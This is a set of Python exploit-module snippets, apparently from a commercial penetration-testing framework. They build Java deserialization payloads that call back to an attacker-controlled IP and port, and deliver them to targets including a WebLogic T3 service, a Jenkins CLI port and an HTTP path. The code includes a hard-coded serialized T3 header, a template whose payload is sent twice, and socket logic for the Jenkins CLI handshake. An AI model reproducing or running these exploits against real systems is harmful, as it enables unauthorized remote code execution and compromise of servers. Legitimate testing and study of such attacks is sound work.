def upload_and_run_mosdef(self):
    """Create the callback payload and POST it to ``self.path_request``.

    The payload is requested from ``objectcreator`` with HTTP and SSL both
    disabled and is addressed to ``self.callback`` (ip and port).  The
    payload size and the request path are logged before the request is made.

    Returns:
        Whatever ``self.ua.POST`` returns.  The call passes
        ``noresponse=True``, so nothing in this method inspects a reply.
    """
    creator = objectcreator(callback_ip=self.callback.ip,
                            callback_port=self.callback.port,
                            use_http=False, use_ssl=False)
    payload = creator.get_payload()

    # Both lines are logged before the request, so the size and the path
    # are on record even if the POST itself raises.
    size_line = 'Payload created (%d bytes).' % len(payload)
    logging.info(size_line)
    path_line = 'Path request: %s' % self.path_request
    logging.info(path_line)

    return self.ua.POST(self.path_request, payload, noresponse=True)
예제 #2
    def evil_t3_message(self, version):
        """Build one length-prefixed message: length field, fixed header, payload.

        Args:
            version: Version string of the target.  When it contains
                "10.3.6" the payload type "java.util.Random" is requested,
                otherwise "java.net.InetAddr".

        Returns:
            A 4-byte big-endian unsigned length followed by the static header
            and the generated payload.  The length value counts the length
            field itself as well as the header and payload.
        """
        # The header is a constant, so it is byte-for-byte identical in every
        # message this method builds; only the length prefix and the payload
        # that follow it vary.
        header = "\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x30\x89\xf4\x5d\x9b\xbc\xf4\x7a\x28\xbc\xca\x70\x70\x18\x1e\x29\xd8\x3f\x5b\x6b\x8a\x60\x22\x04\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00"
        length_field_size = 4

        if "10.3.6" in version:
            payload_type = "java.util.Random"
        else:
            payload_type = "java.net.InetAddr"

        creator = objectcreator(callback_ip=self.callback.ip,
                                callback_port=self.callback.port,
                                use_http=self.needs_mosdef_http(),
                                use_ssl=False)
        body = header + creator.get_payload(payload_type)

        # NOTE(review): joining struct.pack() output with a str literal relies
        # on str being a byte string (Python 2 semantics) -- confirm runtime.
        total_length = len(body) + length_field_size
        return struct.pack(">L", total_length) + body
예제 #3
    def upload_and_run_mosdef(self):
        """Fill the 'evildata' template with a payload and send it twice.

        The payload type depends on ``self.version``: "java.util.Random" when
        the version contains "10.3.6", otherwise "java.net.InetAddr".  The
        payload is requested with HTTP and SSL both disabled and its size is
        logged.

        The template's "THE_PAYLOAD" marker is replaced with the payload, and
        the first four bytes of the result are overwritten with the big-endian
        unsigned length of the whole buffer (those four bytes included).

        Returns:
            None.  Nothing here checks whether either send had any effect.
        """
        if "10.3.6" in self.version:
            payload_type = "java.util.Random"
        else:
            payload_type = "java.net.InetAddr"

        creator = objectcreator(callback_ip=self.callback.ip,
                                callback_port=self.callback.port,
                                use_http=False,
                                use_ssl=False)
        payload = creator.get_payload(payload_type)
        logging.info('Payload created (%d bytes).' % len(payload))

        # Substitute the payload into the template first; the length written
        # below is measured on the substituted buffer.
        filled = PAYLOADS['evildata'].replace("THE_PAYLOAD", payload)

        # The leading four bytes of the template are a length placeholder:
        # drop them and prepend the real length in their place.
        length_prefix = struct.pack('>I', len(filled))
        the_poison = length_prefix + filled[4:]

        # The same buffer is sent two times; the original author's note says
        # both sends are required before a callback is received.
        for _ in range(2):
            self.send_evil_object(the_poison)
예제 #4
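    def run(self):
        """Send the generated payload over the Jenkins CLI port, if one is found.

        Steps, as visible in this method: read the arguments, look up the CLI
        port with ``get_jenkins_info()``, open a TCP connection to it, send
        the "Protocol:CLI-connect" string, read the greeting, and send back
        the greeting's prefix up to and including the first '>' followed by
        the base64-encoded payload.  The method then waits five seconds and
        closes the socket.

        Returns:
            0 when ``get_jenkins_info()`` returned None (nothing is sent),
            1 when the exchange completed without raising.  A return of 1
            only means the bytes were sent: this method never checks whether
            a callback arrived.

        Raises:
            Socket errors and timeouts propagate to the caller, as does the
            ValueError from ``blob.index('>')`` when the greeting contains
            no '>'.
        """
        self.getargs()

        self.setInfo("%s attacking %s:%d (in progress)" %
                     (self.name, self.host, self.port))
        self.log("Using version: %s" % self.version)

        cli_port = self.get_jenkins_info()
        if cli_port is None:
            # No CLI port was reported, so there is nothing to connect to.
            return 0

        self.log("Grabbed Jenkins CLI protocol V1 port:%d" % cli_port)

        self.setProgress(33)

        payload = objectcreator(callback_ip=self.callback.ip,
                                callback_port=self.callback.port,
                                use_http=self.needs_mosdef_http(),
                                use_ssl=False).get_payload()

        sock = socket.socket(socket.AF_INET)
        try:
            # A 3 second timeout bounds connect, send and receive alike.
            sock.settimeout(3.0)

            sock.connect((self.host, cli_port))

            # NOTE(review): progress steps back from 33 to 25 here; the
            # sequence is kept exactly as the original reported it.
            self.setProgress(25)

            sock.sendall(self.jenkins_string("Protocol:CLI-connect"))

            blob = self.welcome_recv(sock)

            self.setProgress(50)

            # Keep the greeting up to and including its first '>' and echo
            # that prefix back in front of the encoded payload.
            remoting_header = blob[:blob.index('>') + 1]

            self.setProgress(75)

            sock.sendall(remoting_header + base64.b64encode(payload))
            self.setInfo("sleeping 5 seconds - waiting for callback...")

            time.sleep(5)
        finally:
            # Close the socket on every path; previously a failed connect,
            # a timeout or a malformed greeting left it open.
            sock.close()

        self.setProgress(100)
        return 1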
예제 #5
    def run(self):
        """Generate a payload, hand it to ``send_request`` and report completion.

        The payload is requested from ``objectcreator`` for ``self.callback``,
        with the HTTP and SSL options taken from ``needs_mosdef_http()`` and
        ``needs_mosdef_ssl()``.

        Returns:
            Always 1.  The "(DONE)" status and the return value are set
            whenever ``send_request`` returns without raising; this method
            does not inspect the outcome of the request.
        """
        self.getargs()

        start_msg = "%s attacking %s:%d (in progress)" % (
            self.name, self.host, self.port)
        self.setInfo(start_msg)

        creator = objectcreator(callback_ip=self.callback.ip,
                                callback_port=self.callback.port,
                                use_http=self.needs_mosdef_http(),
                                use_ssl=self.needs_mosdef_ssl())
        self.send_request(creator.get_payload())

        # Name, host and port are read again here rather than reused from the
        # first status line, exactly as the original did.
        done_msg = "%s attacking %s:%d (DONE)" % (
            self.name, self.host, self.port)
        self.setInfo(done_msg)

        return 1